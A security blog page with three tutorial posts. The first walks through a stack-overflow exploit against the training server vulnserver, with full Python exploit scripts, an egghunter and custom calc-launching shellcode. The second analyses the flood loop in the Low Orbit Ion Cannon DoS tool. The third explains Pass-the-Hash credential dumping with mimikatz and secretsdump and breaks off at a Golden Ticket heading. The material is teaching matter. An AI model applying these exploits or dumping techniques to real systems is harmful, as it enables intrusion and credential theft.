Apr 292016

Preface: Although this blog post is a companion post to a talk I recently gave it does not depend on the talk itself. The idea is to provide some kind of reference and clarification for some technical details.

Generally, the talk – and therefor this post – is about finding and abusing a vulnerability in vulnserver to gain code execution. As this is a quite complex topic, I will try to make every step as clear as possible. However, this is by far not a step-by-step manual: Its goal it to give you valuable hints but still forces you to figure out many things on your own!

Before we start you need the following requirements:

  • A fully patched Windows 7 x64 VM (x86 might work but has not been testet!)
  • A Kali VM (or any other system with Metasploit)
  • Immunity Debugger (For simplicity reasons simply install the bundled Python version – I had troubles getting newer versions to work; Furthermore manually update your PATH so that it encludes C:\Python27)
  • The mona.py Immunity Debugger Extension
  • The Microsoft Developer Command Prompt for VS (as bundled with Visual Studio Express)
  • The vulnerable server application vulnserver (Download at the bottom of the site)
  • The string_to_push.py helper script
  • Our custom shellcodes: download
  • A good text editor like Notepad++
  • A hex editor like HxD

Identifying a vulnerability

The first and often most difficult step is to actually find a vulnerability that can be abused to gain code execution. In this case we will use a technique called Fuzzing. Thereby we simply send unexpected data to the service and observe what happens. As vulnserver’s main goal it so be vulnerable it is quite easy to trigger a fault. For example I wrote the following simple python scripts “1 fuzzer.py” that simply connects to a locally running vulnserver and executes every supported command with a parameter of 10000 A’s.

#!/usr/bin/env python

import socket

IP = ''
PORT = 6666


for cmd in CMDS:

 print "Connecting to "+IP+" on port "+str(PORT)
 print ""

 s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
 s.connect((IP, PORT))
 print s.recv(BUFFER_SIZE)

 #print "Supported commands:"
 #print s.recv(BUFFER_SIZE)

 print "Attacking "+cmd
 s.send(cmd+" "+(10000*"A"))
 print s.recv(BUFFER_SIZE)

Guess what, after launching the fuzzer it did not take very long for vulnserver to crash:
Screen Shot 2016-04-15 at 09.07.13
Based on the output we can see that the last tested command was KSTET. That means we will now focus on what exactly happened. To do so we have to debug vulnserver within Immunity Debugger.

Verifying the Vulnerability

Before we start verifying the vulnerability here are a few tips:

  • If you are using a custom port (6666) like I do, you can configure the process arguments in the Debugger -> Arguments menu
  • I really recommend you to learn some of the keyboard shortcuts (Run and Continue: F9, Restart: CRTL+F2, Stop: ALT+F2)
  • Youtube is a great resource for hands-on Immunity Debugger tipps and trick

To be able to analyse the issue in more detail I updated my fuzzer to only test the KSTET command. Thereby it’s easier to focus on the important things:

#!/usr/bin/env python

import socket

IP = ''
PORT = 6666

cmd = "KSTET"

print "Connecting to "+IP+" on port "+str(PORT)
print ""

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((IP, PORT))
print s.recv(BUFFER_SIZE)

print "Attacking "+cmd
s.send(cmd+" "+(10000*"A"))
print s.recv(BUFFER_SIZE)

After that I launched vulnserver within Immunity Debugger and skipped all the default breakpoint (using F9) so that the main server listener process was started. After that I executed our targeted fuzzer script:
Screen Shot 2016-04-15 at 09.24.16

As you can see our fuzzer managed to trigger a stack overflow vulnerability that finally caused EIP to be 41414141 (AAAA). What that means is we triggered a bug in the application that allows us to control what instruction should be executed next. The following image illustrates what has happened.


Identifying the Offset

However, right now we are sending 10000 A’s. That means we have no clue which A exactly controls EIP. To identify the offset we can use Metasploit. To do so, fire up your Kali VM and connect to it using SSH. After that run the following command to create a unique pattern:

root@kali:~ /usr/share/metasploit-framework/tools/pattern_create.rb 10000

Screen Shot 2016-04-15 at 09.48.47Now update your fuzzer to send that unique pattern instead of the A’s and again inspect the output in Immunity Debugger:
Screen Shot 2016-04-15 at 09.53.09
As you can see we again triggered some kind of error. However this time we can exactly identify which offset allows us to control the execution flow. To do so we use another Metasploit tool:

root@kali:~ /usr/share/metasploit-framework/tools/pattern_offset.rb 63413363
[*] Exact match at offset 70

This means, that the value at offset 70 is the one that overwrites the return address on the stack and finally ends up in EIP. As EIP contains the address of the next instruction that will be executed we now have to find a suitable address we can jump to.

Gaining Code Execution

Before searching for a suitable address we have to think about our next step: Delivering our payload. Our malicious code also has to be delivered with our exploit. Therefore it makes sense to first inspect the memory layout during the stack overflow in detail so we can find space for it. I updated the fuzzer again so we can learn more about possible attack vectors during our analysis:

#!/usr/bin/env python

import socket

IP = ''
PORT = 6666

cmd = "KSTET"
pattern = "Aa0Aa1Aa2Aa3Aa4Aa5Aa6A..."

print "Connecting to "+IP+" on port "+str(PORT)
print ""

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((IP, PORT))
print s.recv(BUFFER_SIZE)

print "Attacking "+cmd
s.send(cmd+" "+pattern)
print s.recv(BUFFER_SIZE)

Now simply rerun vulnserver within Immunity Debugger and launch the above fuzzer. Continue the execution until the process terminates. Very important: Ignore all messageboxes and really continue the execution until the process dies (Debugged program was unable to process exception)! The following screenshots shows the expected results including some remarks:

Screen Shot 2016-04-15 at 11.09.49

We can get quite a lot of important information out of this crash:

  1. Our 70 byte offset is correct
  2. ESP points to our B’s. That means we can use it to place and execute code from there.
  3. However as there are only 20 B’s we only have 20 bytes for our payload…. That means we have to use several stages!
  4. Our 70 byte offset can be reused within our staged exploit

The following image tries to clarify the output even more:

Based on that we will now take the following steps:

  1. Find an “JMP ESP” instruction to jump to => That transfers control to the commands in the memory region where our B’s were and that we control
  2. There we place some custom ASM instructions that transfer control to the beginning of our A’s. Then we have at least 70 bytes for our next payload stage.

Finding an JMP ESP Instruction

As stated above, we first have to find an JMP ESP instruction within the process memory. However there is one more thing to consider: ASLR. ASLR is a security feature that randomizes the addresses of the process memory. That means that we can not simply use any JMP ESP instruction as most of them will have a different memory address after a process or system restart. So in the first step we have check if there are any non-ASLR library loaded and than search for an JMP ESP instruction within them.

Screen Shot 2016-04-15 at 11.51.53

The screenshot above illustrated this process. At first we use the command !mona noaslr to list all modules that don’t use ASLR. The important thing is that we can only use modules that don’t have a NULL (00) character within their address. That mean only essfunc.dll is suitable for our needs.

To check if there are any JMP ESP instructions within essfunc.dll the follwing command can be used: !mona find -type instr -s “jmp esp” -m essfunc.dll (The command has been changed). It lists all found instructions with their corresponding address. The first one at 0x625011AF is already perfectly suitable for us: It contains the correct instruction and its address does not include NULL characters.

We can now again update our exploit with the new destination address. Also note that I replaced the B’s with a single 0xCC. This maps to the assembler command INT 3h, which in turn triggers a breakpoint within our debugger. Thereby we can easily verify if you exploit is working as expected.

#!/usr/bin/env python
import socket

IP = ''
PORT = 6666

cmd = "KSTET"

addr = "\xAF\x11\x50\x62" # JMP ESP in essfunc.dll (0x625011AF)

pattern = 70*"A"+addr+TRIGGER_BREAKPOINT

print "Connecting to "+IP+" on port "+str(PORT)
print ""

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((IP, PORT))
print s.recv(BUFFER_SIZE)

print "Attacking "+cmd
s.send(cmd+" "+pattern)
print s.recv(BUFFER_SIZE)

If everything worked as expected the breakpoint should be hit and your Immunity Debugger should look similar to the following screenshot:
Screen Shot 2016-04-24 at 20.13.53

Creating a Little Room to Breathe

Although we finally managed to get code execution we only have 20 bytes… That’s not a lot so we need to make ourself a little more room to breathe. To do so we will jump from our initial 20 byte buffer to the much larger 70 byte memory region at the beginning of our buffer. The following color-coded image illustrates the next steps:


As already documented in the image we have to jump from the initial memory region to the 70 byte buffer in front of it. As this buffer starts 74 bytes in front of where ESP currently points to we simply subtract 74 from ESP (SUB ESP,74) and the jump there (JMP ESP). Metasploit’s interactive nasm_shell ASM helper utility helps us to convert this instructions to hex:

root@kali:~ /usr/share/metasploit-framework/tools/nasm_shell.rb 
nasm: sub esp,74;
00000000  83EC4A            sub esp,byte +0x4a
nasm: jmp esp;
00000000  FFE4              jmp esp
nasm: quit

Now the exploit can be updated with this instructions:

#!/usr/bin/env python
import socket

IP = ''
PORT = 6666

cmd = "KSTET"
jmp_esp_addr = "\xAF\x11\x50\x62" # JMP ESP in essfunc.dll (0x625011AF)
sub_esp_74 = "\x83\xEC\x4A" # sub esp,74;
jmp_esp = "\xFF\xE4" # jmp esp


print len(shellcode)
pattern = shellcode+(70-len(shellcode))*"A"+jmp_esp_addr+sub_esp_74+jmp_esp

print "Connecting to "+IP+" on port "+str(PORT)
print ""

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((IP, PORT))
print s.recv(BUFFER_SIZE)

print "Attacking "+cmd
s.send(cmd+" "+pattern)
print s.recv(BUFFER_SIZE)

After verifying with Immunity Debugger that everything is working, we can lean back and simply use a suitable Metasploit payload: The only problem is, there is none… All Windows payloads are bigger than 70 bytes (/usr/share/metasploit-framework/tools/payload_lengths.rb |grep windows).

The Egg to the Rescue

Luckily this problem has been encountered before an there even is a solution: Egg hunting. The principle is pretty easy: The attacker somehow places a shellcode in the attacked process, prepended with some special string (the egg). After that he triggers the actual vulnerability and drops the egg hunter. This little function starts to search the egg within the process’s memory and if found redirects execution to the shellcode. I really recommend Corelan’s blog post for further details: Exploit writing tutorial part 8 : Win32 Egg Hunting.

Tipp: Before continuing any further change Immunity’s Exception configuration so that Memory access violations are ignored! They are used internally by the egg hunter and make it impossible to work with the debugger if not disabled.

Screen Shot 2016-04-24 at 21.30.03After that, there is only one last problem: How can the shellcode be placed into memory? Well, the good thing is we have access to vulnserver’s sourcecode (vulnserver.c):

char *GdogBuf = malloc(1024);
} else if (strncmp(RecvBuf, "GDOG ", 5) == 0) {				
	strncpy(GdogBuf, RecvBuf, 1024); // GdogBuf is a connection-wide variable
SendResult = send( Client, "GDOG RUNNING\n", 13, 0 );

From there the GDOG command looks interesting: It stores up to 1024 bytes in a connection specific variable. That means the value is kept in memory as long as the connection is not terminated. This is perfectly suitable for our needs. Here’s our update plan:

  1. Connect to vulnserver
  2. Place the actual shellcode – prepended with our egg – into the victim process’s memory using the GDOG command
  3. Trigger the vulnerability within the KSTET implementation while also delivering our egg hunter and overwriting the return address with the address of JMP ESP within essfunc.dll.
  4. After the execution has been forwarded to our small 20 byte buffer, jump to the bigger 70 byte buffer
  5. There start the egg hunter
  6. Win!

Here is the updated two-stage exploit. As you can see it is a little more complex – however, nothing really special. It uses the universal (x86 and Wow64) Corelan Egg hunter documented in their blog post WoW64 Egghunter. It abuses the NtAccessCheckAndAuditAlarm syscall to prevent access violations. To learn more about Egg hunting in general click here.

#!/usr/bin/env python
import socket

IP = ''
PORT = 6666
EGG = "\x77\x30\x30\x74" # tag w00t

# ASM Commands

NOP = "\x90"

# W32, WOW EGGHUNTER form https://www.corelan.be/index.php/2010/01/09/exploit-writing-tutorial-part-8-win32-egg-hunting/
EGGHUNTER += "\x66\x8c\xcb\x80\xfb\x23\x75\x08\x31\xdb\x53\x53\x53\x53\xb3\xc0"
EGGHUNTER += "\x66\x81\xca\xff\x0f\x42\x52\x80\xfb\xc0\x74\x19\x6a\x02\x58\xcd"
EGGHUNTER += "\x2e\x5a\x3c\x05\x74\xea\xb8"
EGGHUNTER += "\x89\xd7\xaf\x75\xe5\xaf\x75\xe2\xff\xe7\x6a\x26\x58\x31\xc9\x89"
EGGHUNTER += "\xe2\x64\xff\x13\x5e\x5a\xeb\xdf"

# Exploit

# shellcode to use:
shellcode = BREAKPOINT 

print ""
print "Exploiting vulnserver (http://tinyurl.com/lwppkof) using "
print " - a stack overflow, "
print " - egg-hunting "
print " - and a custom shellcode"
print ""
print "Egg hunter size: "+str(len(EGGHUNTER))+"/74 bytes"
print "Shellcode size: "+str(len(shellcode+EGG+EGG))+"/1024 bytes"
print ""

print "Connecting to vulnserver "+IP+" on port "+str(PORT)
print ""
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((IP, PORT))
print s.recv(BUFFER_SIZE)

# 1) put shellcode into memory!
cmd = "GDOG"

print "Sending shellcode using "+cmd
data=cmd+" "+EGG+EGG+shellcode

s.send(cmd+" "+data)
print s.recv(BUFFER_SIZE)

# 2) sending exploit
cmd = "KSTET"
jmp_esp_addr = "\xAF\x11\x50\x62" # in vulnerable dll
sub_esp_74 = "\x83\xEC\x4A"
jmp_esp = "\xFF\xE4"

data = EGGHUNTER+(70-len(EGGHUNTER))*"A"+jmp_esp_addr+sub_esp_74+jmp_esp
print "Shellcode Padding: "+str(len(EGGHUNTER))
print "Attacking "+cmd

s.send(cmd+" "+data)

After watching the egg hunter do its job, Immunity Debugger should catch the INT 3h breakpoint. You can inspect the memory in front of the current instruction pointer: It should contain the egg(s) we have placed.

Screen Shot 2016-04-24 at 21.40.46

To summarise: We triggered a buffer overflow, overwrote the return address on the stack, jumped from our small 20 byte buffer to our bigger 70 byte buffer, where we stored our Egg hunter. This Egg hunter then searched the process’s memory for the egg and transferred execution to the instruction after it. Well done!

In the next step we need some kind of shellcode to do some actual “malwary” stuff. As I was unable to get the Metasploit payloads (msfvenom -a x86 –platform windows -p windows/messagebox TEXT=”We are evil” -f python -b “\x00” -v MSF_PAYLOAD) to execute reliably I wrote my own.

Writing the shellcode

However as it is quite difficult to write a shellcode from scratch (especially if you have never done it before) I went with a well documented template, namely NoviceLive’s. Before we start adapting it, let’s define our goal: As this is some kind of “tutorial” we will just execute calc.exe to proof that we gained code execution. However we will take the cool way(R) and use Powershell to do so. Thereby this example can be easily modified to do something else.

Let’s start with discussing the inner workings of the messagebox shellcode. To do so we use the following pseudocode snipped instead of the actual ASM code. This makes it a little easier to understand everything.

function main:
    // Prepare 
    peb = NtCurrentTeb().ProcessEnvironmentBlock // TEB = Thread Environment Block 
    ldr = peb.Ldr; // get list of loaded modules
    kernel32_dll_base = find_kernel32_dll_base() // get kernel32.dll
    get_proc_address = find_get_proc_address(kernel32_dll_base) // get address of GetProcAddress 
    load_library = get_proc_address(kernel32_dll_base,"LoadLibraryA") // find pointer to LoadLibrary
    // Do the actual shellcode thing
    user32_dll_base = load_library("user32") // load user32.dll library
    message_box_a = get_proc_address(user32_dll_base,"MessageBoxA") // find pointer to MessageBoxA
    message_box_a(NULL, "Hello World!", NULL, MB_OK) // display "Hello World" msgbox
    exit_thread = get_proc_address(kernel32_dll_base,"ExitThread") // find pointer to ExitThread
    exit_thread() // exit thread in a clean way
function find_kernel32_dll_base:
    for module in ldr.InInitializationOrderModuleList:
        if module.BaseDllName[6] == "3": // if module.BaseDllName == 'kernel32.dll':
            return module.AddressOfNames // simplified
function find_get_proc_address(kernel32_dll_base):
    exportNamePointerTable = kernel32_dll_base.ExportNamePointerTable
    for pointer in exportNamePointerTable: // simplified
        if pointer.name == "GetProcA":
            return pointer.AddressOfFunctions

As soon as the execution of the shellcode is triggered it first has to find all the necessary function addresses to do something useful. NoviceLive’s messagebox shellcode simply opens a messagebox (who would have thought that) so it needs a reference to the corresponding ShowMessageBoxA function. To get this reference it first loads the User32 library (as stated at the bottom of the linked MSDN page) that exports ShowMessageboxA.

Writing Shellcode is quite different from normal programing: You don’t have all the little helpers – like a higher level programming language or a loader that fixes your addresses –  so you have to do all that hand. But that will not stop us!

So let’s start:

  1. As the shellcode is blind in the beginning (in the sense that it does not know anything about the memory layout of the process) it has to obtain some kind of reference. This reference – namely the base address of kernel32 – is extracted from the Thread Environment Block using the loaded modules list (Ldr).
  2. After that all the exported functions of kernel32 are iterated to find the address of GetProcAddressA.
  3. GetProcAddressA is than used to find the memory location of LoadLibraryA
  4. Now the actual shellcode starts: LoadLibraryA is used to ensure that user32 is loaded
  5. GetProcAddressA is then called to obtain the function pointer to MessageBoxA
  6. After manually pushing all the function parameters to the stack MessageBoxA is finally called and a messagebox is shown.
  7. To clean up GetProcAddressA is used again to obtain the pointer for ExitThread, which in turn is then called to exit the current thread.

To test the initially obtain shellcode open the Developer Command Prompt for VS2015 (or whatever version you have installed) and run the build32.cmd from within the messagebox folder (you can download the package with all different shellcodes from here). As shown below you can verify that the shellcode is working by simply running the EXE that was built.

Screen Shot 2016-04-28 at 11.08.21

To finally test the shellcode in the exploit open the previously created EXE within your hex editor of choice (like HxD) and copy the actual shellcode instructions into a text editor (like Notepad++). Then fix it so that it is a valid Python string (using search and replace to replace all spaces with \x should to the trick – don’t forget the first hex char!)

Screen Shot 2016-04-28 at 11.19.34

Then update the exploit with the newly created payload (Attention: payload truncated!):

#!/usr/bin/env python
import socket

IP = ''
PORT = 6666
EGG = "\x77\x30\x30\x74" # tag w00t

# ASM Commands

NOP = "\x90"

# W32, WOW EGGHUNTER form https://www.corelan.be/index.php/2010/01/09/exploit-writing-tutorial-part-8-win32-egg-hunting/
EGGHUNTER += "\x66\x8c\xcb\x80\xfb\x23\x75\x08\x31\xdb\x53\x53\x53\x53\xb3\xc0"
EGGHUNTER += "\x66\x81\xca\xff\x0f\x42\x52\x80\xfb\xc0\x74\x19\x6a\x02\x58\xcd"
EGGHUNTER += "\x2e\x5a\x3c\x05\x74\xea\xb8"
EGGHUNTER += "\x89\xd7\xaf\x75\xe5\xaf\x75\xe2\xff\xe7\x6a\x26\x58\x31\xc9\x89"
EGGHUNTER += "\xe2\x64\xff\x13\x5e\x5a\xeb\xdf"

# Messagebox Shellcode /Tools/shellcoding-master/windows/messagebox/messagebox32.asm 
MSGBOX = "\x33\xC9\x64\x8B\x49\x30\x8B ... ";

# Exploit

# shellcode to use:
shellcode = MSGBOX 

print ""
print "Exploiting vulnserver (http://tinyurl.com/lwppkof) using "
print " - a stack overflow, "
print " - egg-hunting "
print " - and a custom shellcode"
print ""
print "Egg hunter size: "+str(len(EGGHUNTER))+"/74 bytes"
print "Shellcode size: "+str(len(shellcode+EGG+EGG))+"/1024 bytes"
print ""

print "Connecting to vulnserver "+IP+" on port "+str(PORT)
print ""
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((IP, PORT))
print s.recv(BUFFER_SIZE)

# 1) put shellcode into memory!
cmd = "GDOG"

print "Sending shellcode using "+cmd
data=cmd+" "+EGG+EGG+shellcode

s.send(cmd+" "+data)
print s.recv(BUFFER_SIZE)

# 2) sending exploit
cmd = "KSTET"
jmp_esp_addr = "\xAF\x11\x50\x62" # in vulnerable dll
sub_esp_74 = "\x83\xEC\x4A"
jmp_esp = "\xFF\xE4"

data = EGGHUNTER+(70-len(EGGHUNTER))*"A"+jmp_esp_addr+sub_esp_74+jmp_esp
print "Shellcode Padding: "+str(len(EGGHUNTER))
print "Attacking "+cmd

s.send(cmd+" "+data)

Now it’s testing time: Run vulnserver (with or without the debugger) and launch the attack: If everything worked as expected a messagebox should open. (Attention: Sometimes it’s not the front most window!)
Screen Shot 2016-04-28 at 11.29.56

Modifying the Shellcode

In the next step the shellcode will be updated to launch calc instead of showing a boring messagebox. To do so we will use the ShellExecuteA API.

After copying the messagebox example, the first change is to load another library – namely shell32 instead of user32.

Screen Shot 2016-04-28 at 11.43.03

Then use the string_to_push.py script to create the necessary instructions that push the string “Shell32” to the stack. As the length of the string has to be a multiply of 4 a single space has to be added. Then replace the old PUSH commands with the newly created one’s and fix them accordingly by removing the 0x prefix and by appending a h postfix.

Beside that a little trick has to be used to create a valid NULL terminated string out of the PUSH commands that were generated. What needs to be done it that the last character – the space that was added – has to be replaced with a NULL character. However the NULL character can not be used as it would truncate the exploit. To workaround this we use a little math trick: The first push instruction push 2032336ch is changed to push 0132336ch. After that the instruction dec byte ptr [esp + 3h] is added. This instruction decrements the first hex character by one and causes the final value to be 0032336ch. Exactly what we wanted: A NULL terminator!

In the final step the original call to MessageBoxA has to be replaced with a call to ShellExecuteA. Based on the MSDN documentation the following C function call has to be implemented:

ShellExecuteA(NULL, NULL, "powershell.exe", "-Command \"calc.exe\"", NULL, 0);

So beginn by removing the original call to MessageBoxA (should be around line 133 to line 155). Then start by using GetProcAddress to request the address of ShellExecuteA:

;; eax = GetProcAddress(eax, "ShellExecuteA")
push edi
;; put "A%00 on stack"
xor ecx, ecx
mov cx, 0141h
push ecx
dec byte ptr [esp + 1h]

push 65747563h ;cute
push 6578456ch ;lExe
push 6c656853h ;Shel
push esp
push eax
call esi

Next push all the required strings to the stack and store their address. Again use the string_to_push.py util to create the initial push instruction. Don’t forget to add and fix the required string NULL characters.

;push powershell.exe to the stack
push 01206578h
dec byte ptr [esp + 3h]
push 652e6c6ch
push 65687372h
push 65776f70h
mov edx, esp ; store the address in edx

;push -Command "calc" to the stack
push 0122636ch
dec byte ptr [esp + 3h]
push 61632220h
push 646e616dh
push 6d6f432dh
mov ecx, esp ; store the address in ecx

As now all prerequisite have been met ShellExecuteA can be invoked:

;; Finally call ShellExecuteA(NULL, NULL, "powershell.exe", "-Command \"calc.exe\"", NULL, 0);
push edi ; Spacing so that is is easier to debug
push edi

push edi ; IsShown = NULL
push edi ; DefDir = NULL

push ecx ; Parameters
push edx ; Filename

push edi ;Operation = default
push edi ;hwnd = NULL
call eax

After all this hard work it is time to test our shellcode. As discussed before use the build32.cmd to compile the ASM instructions and launch the created EXE. If calc.exe is started then everything is correct. Otherwise I recommend to directly debug the application using Immunity Debugger to check exactly what is going wrong.

Then again open the EXE in a hex editor and copy the shellcode to a text editor. There add the required \x prefixes by using search and replace so that a valid Python string is created. After that add it to the exploit script:

#!/usr/bin/env python
import socket

IP = ''
PORT = 6666
EGG = "\x77\x30\x30\x74" # tag w00t

# ASM Commands

NOP = "\x90"

# W32, WOW EGGHUNTER form https://www.corelan.be/index.php/2010/01/09/exploit-writing-tutorial-part-8-win32-egg-hunting/
EGGHUNTER += "\x66\x8c\xcb\x80\xfb\x23\x75\x08\x31\xdb\x53\x53\x53\x53\xb3\xc0"
EGGHUNTER += "\x66\x81\xca\xff\x0f\x42\x52\x80\xfb\xc0\x74\x19\x6a\x02\x58\xcd"
EGGHUNTER += "\x2e\x5a\x3c\x05\x74\xea\xb8"
EGGHUNTER += "\x89\xd7\xaf\x75\xe5\xaf\x75\xe2\xff\xe7\x6a\x26\x58\x31\xc9\x89"
EGGHUNTER += "\xe2\x64\xff\x13\x5e\x5a\xeb\xdf"

# Messagebox Shellcode /Tools/shellcoding-master/windows/messagebox/messagebox32.asm 
RUN_CALC = "\x33\xC9\x64\x8B\x49\..."

# Exploit

# shellcode to use:
shellcode = RUN_CALC 

print ""
print "Exploiting vulnserver (http://tinyurl.com/lwppkof) using "
print " - a stack overflow, "
print " - egg-hunting "
print " - and a custom shellcode"
print ""
print "Egg hunter size: "+str(len(EGGHUNTER))+"/74 bytes"
print "Shellcode size: "+str(len(shellcode+EGG+EGG))+"/1024 bytes"
print ""

print ">> Connecting to vulnserver "+IP+" on port "+str(PORT)
print ""
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((IP, PORT))
print s.recv(BUFFER_SIZE)

# 1) put shellcode into memory!
cmd = "GDOG"

print ">> Sending shellcode using "+cmd
data=cmd+" "+EGG+EGG+shellcode

s.send(cmd+" "+data)
print s.recv(BUFFER_SIZE)

# 2) sending exploit
cmd = "KSTET"
jmp_esp_addr = "\xAF\x11\x50\x62" # in vulnerable dll
sub_esp_74 = "\x83\xEC\x4A"
jmp_esp = "\xFF\xE4"

data = EGGHUNTER+(70-len(EGGHUNTER))*"A"+jmp_esp_addr+sub_esp_74+jmp_esp
print ">> Shellcode Padding: "+str(len(EGGHUNTER))
print ">> Attacking "+cmd

s.send(cmd+" "+data)

Presumably everything was done correctly the exploit should launch calc.exe:

Screen Shot 2016-04-28 at 12.38.07

Well done: You have reached the end of this very very very long post. I hope you will try to exploit or even already exploited the vulnerability on your own. I at least had a lot of fun while solving the puzzles and additionally learned a lot while doing so!

May 272015

Recently our team was tasked with creating a demo to illustrate the effects of Denial of Service (DoS) attacks. As I was particularly interested in how the available attack tools work I studied the sourcecode of one of them – the Low Orbit Ion Cannon. In this post is will cover the surpising simplicity of the implementation. However to get a context let’s start first  with discussing how DoS attacks generally work, illustrated on the basis of the following setup:

dos (1)

In our simple demo network there are only three participants: A central webserver as victim, a legitimate user that wants to connect to the webserver and an attacker. In the beginning the legitimate user can browse the webpage hosted on the webserver smoothly. However as soon as the attacker starts his DoS attack the legitimate user’s requests either take very long to finish or even fail completely. This instability is caused by the attack overloading either the webserver’s connection or the server process itself.

One tool an attacker could use for these kind of attack is the free and open source Low Orbit Ion Cannon. It is a very easy to use application with a nice graphical user interface. The video embedded below contains a short walk though.

Now let’s get our hands dirty: To find out how the application attacks the victim’s server in detail we have to download and analyse the source. Below is a cleaned up and simplified version of the method responsible for carrying out the actual HTTP Denial of Service attack.

byte[] buf = System.Text.Encoding.ASCII.GetBytes(String.Format("GET {0} HTTP/1.0{1}{1}{1}", Subsite, Environment.NewLine));
var host = new IPEndPoint(System.Net.IPAddress.Parse(IP), Port);

while (this.IsFlooding) {
	byte[] recvBuf = new byte[64];
	var socket = new Socket(AddressFamily.InterNetwork, SocketType.Stream, ProtocolType.Tcp);

	socket.Send(buf, SocketFlags.None);

	socket.Receive(recvBuf, 64, SocketFlags.None);

To my surprise the method was a lot shorter and less complex than I expected. I will now try to walk you trough the functionality so that you also understand what is going on even if you are not a developer .

In the first two lines the application prepares the attack’s underlying HTTP request and sets the target IP address and the target port. Although it’s done in an rather unusual way it’s a legitimate implementation for an application requesting data from an external HTTP service. In the following third line the while command tells the system to repeat all enclosed and indented further commands. Within this section the actual attack is launched. However to do so two more things need to be prepared: At first in line 5 a buffer called recvBuf is created that is used to store the subsequential answer from the victim and in line 6 further connection details like the use of the TCP protocol are specified. Finally in line 8 the network connection to the victim’s server is established and in line 9 the HTTP request that was created in the beginning is sent. The subsequent receive method call in line 10 stores the first 64 byte of the server’s reply in the previously created receive buffer recvBuf. This forces the application to wait for the server to reply before it moves on. Until now we behaved like a normal web browser. However as the last command within the while loop was reached the whole process beginning at line 5 is repeated. Again and again and again …

What that means is we didn’t really use any service and just created unnecessary load on the server and the network connection. As the attack requests are generally repeated as fast as possible and are executed in parallel this load can render services unusable or even bring them down completely. This is especially true for Distributed Denial of Service (DDoS) attacks where many attackers or their bots join forces to attack a target as happend to the Playstation Network in 2014.

To recap: The sourcecode contains no nasty little tricks or algorithms that require any special knowledge. That means you don’t need to be a genius to write an effective and widely used Denial of Service attack tool. For me that is somewhat frightening!

May 122015

The first and most important thing you need to know about the Pass the Hash (PtH) attack is, that it is not a single attack but actually a whole group of attacks that should correctly be called Pass the X. In any of these, the attacker obtained some kind of user identifying information (like the plaintext user password, a password hash or a Kerberos ticket) and uses them to impersonate as that user. This post focuses on the NTLM hash and the Kerberos tickets as they are the most interesting one’s from the Pass the X’s point of view. This attack is possible not because of a security vulnerability or design issue but because of the infrastructure necessary to enable single sign on (SSO). Although it can be used on any operating system and any version, Windows networks are the primary target.

At TechEd North America 2014 Mark Russinovich and Nathal Ide gave a great talk on the technical background of Pass the Hash styled attacks. It’s available on Youtube and I really encourage you to watch it.

In the following paragraphs I will try to give an overview about the different Pass the Hash attacks and scenarios. However this is not a tutorial and so I will not document the specific commands. Please see the section “Your Toolbox” for further details, tutorials and the necessary tools.

Where To Obtaining User Identifying Information From?

Before an attacker can start a Pass the X attack he has to obtain something to pass along. There are two ways to do so. Either he gains local administrator rights on a client and dumps the hashes of all currently logged in users from the so called Local Security Authority or he gains access to a Domain Controller and dumps possibly all user hashes from the AD.

Dumping from a Client

Let’s start with the somewhat less severe scenario of a client overtaken by an attacker with access to a local administrator. In Windows the Local Security Authority or lsass.exe is the process responsible for enforcing the security policy on the system. Furthermore it is also responsible for transparently authorizing the users to the services they want to use. For example if a user connects to a file server the system negotiates the protocol to use and the Local Security Authority transparently tries to sign the user in. It supports many different protocols like NTLM, Digest and Kerberos and it can also be extended by plugins.

The important thing is that depending on the protocol, the system has to cache a varied of user identifying data in order to successfully reauthorize the user. For example the Digest module needs to cache the user password in reversible encrypted form. An attacker can use any of this user idenfitiying information for this Pass the X attack.


With that knowledge any local administrator can dump the memory of the lsass process (with for example mimikatzWCE or Task Manager’s Create Dump File) and thereby obtains the cached user identifying information of all currently signed in users. Depending on the enabled modules this at least reveals some password hashes but it might also already dump their plaintext password.

Dumping from Active Directory

The second way of dumping user identifing information can only be used by an attacker that already gained access to a Domain Controller. There he can dump the LM and/or the NTLM hashes of all users as they are stored in the Active Directory. Again it does not really matter which one he captures as both can be misused.

You may ask why an attacker with Domain Admin access still leverages Pass the Hash styled attacks? Well, it allows him to impersonate as any user on the domain without knowing or resetting the user password. Thereby he can easily access the user’s Exchange and Sharepoint account as well as connect to any file share the user has access to. This approach is especially great when giving presentations to C level executives. They may not care about an attacker being Domain Admin but they will care for sure if it allows them to access their mailbox or calendar.


As it is a little more complex to dump the hashes out of the Active Directory I will cover this process briefly. Generally there are two steps: At first an attacker creates an offline copy of the registry and the AD. This can be done with the help of ntdsutil and VSS. Then he moves the files off the Domain Controller to his local machine. There he uses a tool like secretsdump to extract the hashes as shown in the picture above.

Using the Hashes

Although you already know that the hashes allow an attacker to impersonate as that owner of the hash, we will now cover this is more detail. If you are interested in a live demonstration I recommend you to watch the first 26 minutes of the talk “Still Passing the Hash 15 Years Later” from Black Hat USA 2012.

As discussed in the beginning the Local Security Authority is responsible for caching the user identifying information. To use the stolen hashes an attacker now simply replaces the user identifying information within the lsass.exe process on his own computer (again with for example mimikatz or WCE) with a stolen one. From the network’s point of view he thereby basically transformed his account to someone else’s. Mark Russinovich and Nathal Ide also talk about this process in their presentation “Pass-the-Hash: How Attackers Spread and How to Stop Them” starting at minute 7:10.

By doing so he also gains the single sign on (SSO) capabilities of the original account because the is what the hashes are intended for. That in turn allows him to use any service and application that builds upon the Windows Integrated Authentication including but not limited to:

  • Microsoft Exchange
  • SMB Filesharing (NTLM authentication over IP, Kerberos authentication over DNS)
  • Microsoft SQL Server
  • Microsoft Navision
  • Microsoft Sharepoint
  • Many business critical web applications
  • Any SAP Application

Again: By replacing the information within the Local Security Authority the attacker changed his identity to someone else’s without knowing the corresponding password. He can use any service the rightful account holder could use as long as it supports single sign on. This also works for accounts that use a two factor authentication like a smartcard as they still rely on the same single sign on infrastructur.

The Golden Ticket

